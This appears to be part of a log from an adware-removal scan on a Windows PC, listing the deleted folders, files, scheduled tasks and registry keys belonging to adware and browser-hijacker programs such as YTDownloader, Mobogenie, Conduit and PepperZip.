[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games Bot
[-] Folder Deleted : C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\Smartbar
[-] Folder Deleted : C:\Users\Nexus Media Server\Documents\Mobogenie
[-] Folder Deleted : C:\Windows\Microsoft\sogrMed
[#] Folder Deleted : C:\Windows\SysNative\Tasks\Astromenda
[#] Folder Deleted : C:\Windows\SysNative\Tasks\YTDownloader
 
***** [ Files ] *****
 
[-] File Deleted : C:\Program Files (x86)\Mozilla Firefox\my.cfg
[-] File Deleted : C:\Program Files\Common Files\System\SysMenu.dll
[-] File Deleted : C:\Program Files\Common Files\System\SysMenu64.dll
[-] File Deleted : C:\Users\LogMeInRemoteUser\Desktop\PepperZip.lnk
[-] File Deleted : C:\Users\Nexus Media Server\daemonprocess.txt
[-] File Deleted : C:\Users\Nexus Media Server\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_cdncache-a.akamaihd.net_0.localstorage
[-] File Deleted : C:\Users\Nexus Media Server\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_cdncache-a.akamaihd.net_0.localstorage-journal
[-] File Deleted : C:\Users\Nexus Media Server\AppData\Roaming\aps.scan.quick.results
[-] File Deleted : C:\Users\Nexus Media Server\AppData\Roaming\aps.scan.results
[-] File Deleted : C:\Users\Nexus Media Server\AppData\Roaming\aps.uninstall.scan.results
[-] File Deleted : C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Knctr.lnk
[-] File Deleted : C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bm.lnk
[-] File Deleted : C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\invalidprefs.js
[-] File Deleted : C:\Users\Nexus Media Server\Desktop\Continue VuuPC Installation.lnk
[-] File Deleted : C:\Users\Nexus Media Server\Desktop\Find Drivers with DriverAgent.lnk
[-] File Deleted : C:\Users\Nexus Media Server\Desktop\PepperZip.lnk
[-] File Deleted : C:\Users\Nexus Media Server\Desktop\SpeedAnalysis.lnk
[-] File Deleted : C:\Users\Nexus Media Server\Desktop\Sync Folder.lnk
[-] File Deleted : C:\Users\Nexus Media Server\Desktop\YTDownloader.lnk
[-] File Deleted : C:\Users\Nexus Media Server\Desktop\Continue GamesDesktop Uninstaller.lnk
[-] File Deleted : C:\Users\Nexus Media Server\Desktop\Continue Games Desktop.lnk
[-] File Deleted : C:\Users\Public\Desktop\Knctr.lnk
[-] File Deleted : C:\Windows\SysNative\ImhxxpComm.dll
[-] File Deleted : C:\Windows\SysNative\drivers\netmon_wfp.sys
 
***** [ DLLs ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
[-] Task Deleted : LaunchApp
[-] Task Deleted : YTDownloader
[-] Task Deleted : YTDownloaderUpd
[-] Task Deleted : web_disco_notification_service
[-] Task Deleted : Microsoft\Windows\Multimedia\SMupdate3
[-] Task Deleted : Microsoft\Windows\Maintenance\SMupdate2
[-] Task Deleted : GoogleUpdateTaskUserM_1_7_22_478699874-4155726479-3780505679-3006UA__333630343534353131342d235b783432415b45345a2d6c
 
***** [ Registry ] *****
 
[-] Key Deleted : HKLM\SOFTWARE\Classes\*\shell\filescout
[-] Key Deleted : HKLM\SOFTWARE\Classes\Prod.cap
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MobogenieAdd
[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [mobilegeni daemon]
[-] Value Deleted : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [YTDownloader]
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\YTDownloader.exe
[-] Key Deleted : HKLM\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\SysMenuExt
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\SysMenu.DLL
[-] Key Deleted : HKLM\SOFTWARE\Classes\Ionic.Zlib.Adler
[-] Key Deleted : HKLM\SOFTWARE\Classes\Ionic.Zlib.ZlibCodec
[-] Key Deleted : HKLM\SOFTWARE\Classes\Ionic.Zlib.ZlibException
[-] Key Deleted : HKLM\SOFTWARE\Classes\MPCBContextMenu.ContextMenu
[-] Key Deleted : HKLM\SOFTWARE\Classes\MPCBContextMenu.IconGenerator
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{37AC0F3B-749F-3B22-811B-5A019EED2E85}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{4392A6CC-7940-310E-8E16-799A8D93A438}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{66DF7821-ED6D-3534-893C-0E89E74B0F91}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{755CAFCC-F016-3B06-8F22-945EAA3AD10D}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{76552F88-640C-314D-82B6-0D8A740907F7}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{05660A04-00F1-3A04-AB3B-BC1074B84D67}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{903F9872-E87F-3B74-83B0-DBE10073B29D}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{9558EEB4-CDA6-3778-B53B-98076F0A1E90}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{B25AA9BA-FD52-3E5E-BFE3-9B106779DA6E}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{C852CF9F-37DC-35AC-926A-7E6CFFF7C501}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{C9777796-4378-3C90-B52D-7238FFFC2A5C}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{DB1BC8B2-FDBF-30E7-BE1C-AFF9160059E6}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{F3D5729C-7DEB-3850-A026-D0E323ECFEF5}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{FEC70973-CB8B-351C-8047-CAE1274CE249}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Ionic.Crc.CRC32
[-] Key Deleted : HKLM\SOFTWARE\Classes\Ionic.Zip.BadCrcException
[-] Key Deleted : HKLM\SOFTWARE\Classes\Ionic.Zip.BadPasswordException
[-] Key Deleted : HKLM\SOFTWARE\Classes\Ionic.Zip.BadReadException
[-] Key Deleted : HKLM\SOFTWARE\Classes\Ionic.Zip.BadStateException
[-] Key Deleted : HKLM\SOFTWARE\Classes\Ionic.Zip.ComHelper
[-] Key Deleted : HKLM\SOFTWARE\Classes\Ionic.Zip.ReadOptions
[-] Key Deleted : HKLM\SOFTWARE\Classes\Ionic.Zip.SelfExtractorSaveOptions
[-] Key Deleted : HKLM\SOFTWARE\Classes\Ionic.Zip.SfxGenerationException
[-] Key Deleted : HKLM\SOFTWARE\Classes\Ionic.Zip.ZipEntry
[-] Key Deleted : HKLM\SOFTWARE\Classes\Ionic.Zip.ZipException
[-] Key Deleted : HKLM\SOFTWARE\Classes\Ionic.Zip.ZipFile
[-] Key Deleted : HKLM\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\MPCBContextMenu
[-] Key Deleted : HKCU\Software\Classes\PepperZip
[-] Value Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [Itibiti.exe]
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\VideoPerformer.exe
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\PepperZip.exe
[-] Key Deleted : HKLM\SOFTWARE\Classes\BrowserHTM
[-] Value Deleted : HKLM\SOFTWARE\Classes\.xht\OpenWithProgIDs [BrowserHTM]
[-] Value Deleted : HKLM\SOFTWARE\Classes\.webp\OpenWithProgIDs [BrowserHTM]
[-] Value Deleted : HKLM\SOFTWARE\Classes\.shtml\OpenWithProgIDs [BrowserHTM]
[-] Value Deleted : HKLM\SOFTWARE\Classes\.html\OpenWithProgIDs [BrowserHTM]
[-] Value Deleted : HKLM\SOFTWARE\Classes\.htm\OpenWithProgIDs [BrowserHTM]
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\ForeceRemove
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\MediaPlayer\ShimInclusionList\browser.exe
[-] Key Deleted : HKLM\SOFTWARE\Classes\AniGIFCtrl.AniGIF
[-] Key Deleted : HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg
[-] Key Deleted : HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2
[-] Key Deleted : HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\P30a187df_e814_44d3_b4a4_2fbe475dba03_.P30a187df_e814_44d3_b4a4_2fbe475dba03_
[-] Key Deleted : HKLM\SOFTWARE\Classes\P30a187df_e814_44d3_b4a4_2fbe475dba03_.P30a187df_e814_44d3_b4a4_2fbe475dba03_.9
[-] Key Deleted : HKLM\SOFTWARE\Classes\PaRiiceDownllOadeir.PaRiiceDownllOadeir
[-] Key Deleted : HKLM\SOFTWARE\Classes\PaRiiceDownllOadeir.PaRiiceDownllOadeir.2.4
[-] Key Deleted : HKLM\System\CurrentControlSet\Services\Eventlog\Application\Update Hatchiho
[-] Key Deleted : HKLM\System\CurrentControlSet\Services\Eventlog\Application\Util Hatchiho
[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION [Plus-HD-1.2-bg.exe]
[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION [Object Browser-bg.exe]
[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION [iWebar-bg.exe]
[-] Key Deleted : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key Deleted : HKLM\SOFTWARE\5f558f8db334ea14
[-] Key Deleted : HKLM\SOFTWARE\74ed1f33-1353-c366-d984-ccbd88bb8dd2
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\{FCF8BFD3-39B8-4370-B464-EC2AAACD97CF}
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\{9CB2CD61-FFA0-406C-9D2D-8FDE6F4A4D8A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\{D813D5BB-EBC7-45F9-B8A4-36A305168069}
[-] Key Deleted : HKCU\Software\Classes\CLSID\{66E8DCC7-97D2-4A89-8E08-D0610FF0878C}
[-] Key Deleted : HKCU\Software\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4}
[-] Key Deleted : HKCU\Software\Classes\CLSID\{E4B02201-EA08-35F8-DE8D-19BB02BBFA9D}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{80922EE0-8A76-46AE-95D5-BD3C3FE0708D}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{AF175732-0D59-716D-F757-9F1492D808D9}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{3070CF0C-F396-3DCA-87D6-9DBF3D77B610}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{4529EB14-6B38-3CC4-9504-6EAB6C9E1255}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{BEEA930F-CD8A-341E-B6B5-5BAF659685D5}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F03955F1-309E-34E9-A021-1399C3532273}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{2097A1B6-E86A-4072-A32D-2249A3ECBC5A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D879A501-50A7-BEFC-A4C5-32DC6E0CB208}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{B33BD6CF-BF4C-4CF0-AC84-B2974BC14ABD}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{30a187df-e814-44d3-b4a4-2fbe475dba03}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F0CBFF50-E1B1-C90B-77E7-6BEC1C577F25}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{A6D54287-7939-466A-8579-92546D946C8C}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{0079F2AC-4B9D-47BB-845C-752AC0708644}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{09B003D5-0209-4B9E-88DA-6AB5226F04F3}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{0C8936A4-FCD5-4393-806B-83EAF53EADEC}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{0F127439-A377-4E4E-A876-BC54C7C4F9B8}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{12CE3764-B926-43C4-9462-CE5ED374CEEB}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{154FDDA9-A1AE-43C9-87D3-A0090EB8F50B}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{191F1F24-6CD9-4CC9-8CF7-1006772638D5}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{222CA129-A00B-4327-AE22-B50A904AC499}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{29C26002-10DE-4440-AB58-588CDCAE63C2}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{37EE300B-C387-4C91-9AF2-884D1C8C2E52}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{45EC1006-A536-4A2D-BE5B-76FE7DBD89DE}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{507C93E2-0D1D-4D4E-BE83-FA90EF8BA7EF}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{55F90AE6-809C-4126-870A-74E892EE0CEE}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{76C5E0A3-B072-4ED0-AAB1-E8B6F063155A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{93B6DC2C-CB0A-47F5-9041-2BFB779380C6}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{984867D2-02A9-4039-918A-F209F0A70F9C}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{9EEC5519-591B-4F67-9E22-2C18C01E0699}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{A7D7CEFD-AEAC-4C31-B0C5-7F44A722CD71}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{AC5090B9-9FFA-48F7-8011-A70E000B85E0}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{C7CA0368-A12C-4575-AC50-CE1734049FF2}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{DC8583CD-B5DB-4C6F-859B-A878C3214770}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{DCE2755B-E4D2-4594-B955-18E2E0E4AE38}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{F147CC38-435E-4362-B344-DE6C77EAE3E7}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{FDAD10B2-FDBC-4870-BA93-D9E9373C350A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{E4C3E50F-5761-4BF8-95A0-939A819DF1C3}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{A0EE0278-2986-4E5A-884E-A3BF0357E476}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{598DCD74-3F5B-4E16-8749-057F426F232A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{5D9FB48A-5CE2-4118-B19F-F88ADDB0F814}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{ADA38E4E-F20A-4399-BE91-E260AC341C69}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{C1EC170E-C5ED-4100-9078-559C31AFDBF5}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{C4D1C553-99C0-48E5-B0A7-B1E00163715C}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{DC4101EC-F2D3-4648-A1F6-B4EECC52443A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{9AE7A6AE-162E-44C4-9A2B-A6B4EF19909D}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{4723AAA8-B2F9-4CC1-9E60-190976DB1FA4}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{30a187df-e814-44d3-b4a4-2fbe475dba03}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F0CBFF50-E1B1-C90B-77E7-6BEC1C577F25}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{4723AAA8-B2F9-4CC1-9E60-190976DB1FA4}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{F0CBFF50-E1B1-C90B-77E7-6BEC1C577F25}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{30a187df-e814-44d3-b4a4-2fbe475dba03}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{F0CBFF50-E1B1-C90B-77E7-6BEC1C577F25}
[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{EEE6C35B-6118-11DC-9C72-001320C79847}]
[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{EEE6C35C-6118-11DC-9C72-001320C79847}]
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{EEE6C367-6118-11DC-9C72-001320C79847}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{17a1668a-3eeb-437f-8b25-9d7206eae93d}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{253d390a-8412-4b6d-86d4-e3cac4fdd5ca}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{020B1D4B-5738-4C77-9E19-4F173DD9B486}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{3070CF0C-F396-3DCA-87D6-9DBF3D77B610}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{4529EB14-6B38-3CC4-9504-6EAB6C9E1255}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{BEEA930F-CD8A-341E-B6B5-5BAF659685D5}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{F03955F1-309E-34E9-A021-1399C3532273}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{2097A1B6-E86A-4072-A32D-2249A3ECBC5A}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{00000000-BA82-4612-BE43-95B8B482C269}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{B33BD6CF-BF4C-4CF0-AC84-B2974BC14ABD}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{30a187df-e814-44d3-b4a4-2fbe475dba03}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{F0CBFF50-E1B1-C90B-77E7-6BEC1C577F25}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{0079F2AC-4B9D-47BB-845C-752AC0708644}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{09B003D5-0209-4B9E-88DA-6AB5226F04F3}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{0C8936A4-FCD5-4393-806B-83EAF53EADEC}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{0F127439-A377-4E4E-A876-BC54C7C4F9B8}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{12CE3764-B926-43C4-9462-CE5ED374CEEB}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{154FDDA9-A1AE-43C9-87D3-A0090EB8F50B}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{191F1F24-6CD9-4CC9-8CF7-1006772638D5}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{222CA129-A00B-4327-AE22-B50A904AC499}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{29C26002-10DE-4440-AB58-588CDCAE63C2}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{37EE300B-C387-4C91-9AF2-884D1C8C2E52}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{45EC1006-A536-4A2D-BE5B-76FE7DBD89DE}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{507C93E2-0D1D-4D4E-BE83-FA90EF8BA7EF}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{55F90AE6-809C-4126-870A-74E892EE0CEE}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{76C5E0A3-B072-4ED0-AAB1-E8B6F063155A}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{93B6DC2C-CB0A-47F5-9041-2BFB779380C6}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{984867D2-02A9-4039-918A-F209F0A70F9C}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{9EEC5519-591B-4F67-9E22-2C18C01E0699}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{A7D7CEFD-AEAC-4C31-B0C5-7F44A722CD71}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{AC5090B9-9FFA-48F7-8011-A70E000B85E0}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{C7CA0368-A12C-4575-AC50-CE1734049FF2}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{DC8583CD-B5DB-4C6F-859B-A878C3214770}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{DCE2755B-E4D2-4594-B955-18E2E0E4AE38}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{F147CC38-435E-4362-B344-DE6C77EAE3E7}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{FDAD10B2-FDBC-4870-BA93-D9E9373C350A}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{E4C3E50F-5761-4BF8-95A0-939A819DF1C3}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{17a1668a-3eeb-437f-8b25-9d7206eae93d}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{253d390a-8412-4b6d-86d4-e3cac4fdd5ca}
[-] Key Deleted : HKCU\Software\Conduit
[-] Key Deleted : HKCU\Software\eSupport.com
[-] Key Deleted : HKCU\Software\GlobalUpdate
[-] Key Deleted : HKCU\Software\IM
[-] Key Deleted : HKCU\Software\InstalledBrowserExtensions
[-] Key Deleted : HKCU\Software\PepperZip
[-] Key Deleted : HKCU\Software\performersoft llc
[-] Key Deleted : HKCU\Software\SoftwareUpdater
[-] Key Deleted : HKCU\Software\tuguu sl
[-] Key Deleted : HKCU\Software\Tutorials
[-] Key Deleted : HKCU\Software\WNLT
[-] Key Deleted : HKCU\Software\YTDownloader
[-] Key Deleted : HKCU\Software\DriverToolkit
[-] Key Deleted : HKCU\Software\subpar
[-] Key Deleted : HKCU\Software\Browser
[-] Key Deleted : HKCU\Software\OffersWizard
[-] Key Deleted : HKCU\Software\MPC
[!] Key Not Deleted : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key Deleted : HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
[-] Key Deleted : HKCU\Software\AppDataLow\Software\BackgroundContainer
[-] Key Deleted : HKCU\Software\AppDataLow\Software\Conduit
[-] Key Deleted : HKCU\Software\AppDataLow\Software\Object Browser
[-] Key Deleted : HKCU\Software\AppDataLow\Software\BackgroundContainerV2
[-] Key Deleted : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
[-] Key Deleted : HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key Deleted : HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}
[-] Key Deleted : HKLM\SOFTWARE\Boost
[-] Key Deleted : HKLM\SOFTWARE\Conduit
[-] Key Deleted : HKLM\SOFTWARE\DnsBasic
[-] Key Deleted : HKLM\SOFTWARE\GlobalUpdate
[-] Key Deleted : HKLM\SOFTWARE\InstalledBrowserExtensions
[-] Key Deleted : HKLM\SOFTWARE\YTDownloader
[-] Key Deleted : HKLM\SOFTWARE\VideoPlayerV3
[-] Key Deleted : HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}
[-] Key Deleted : HKLM\SOFTWARE\IGS
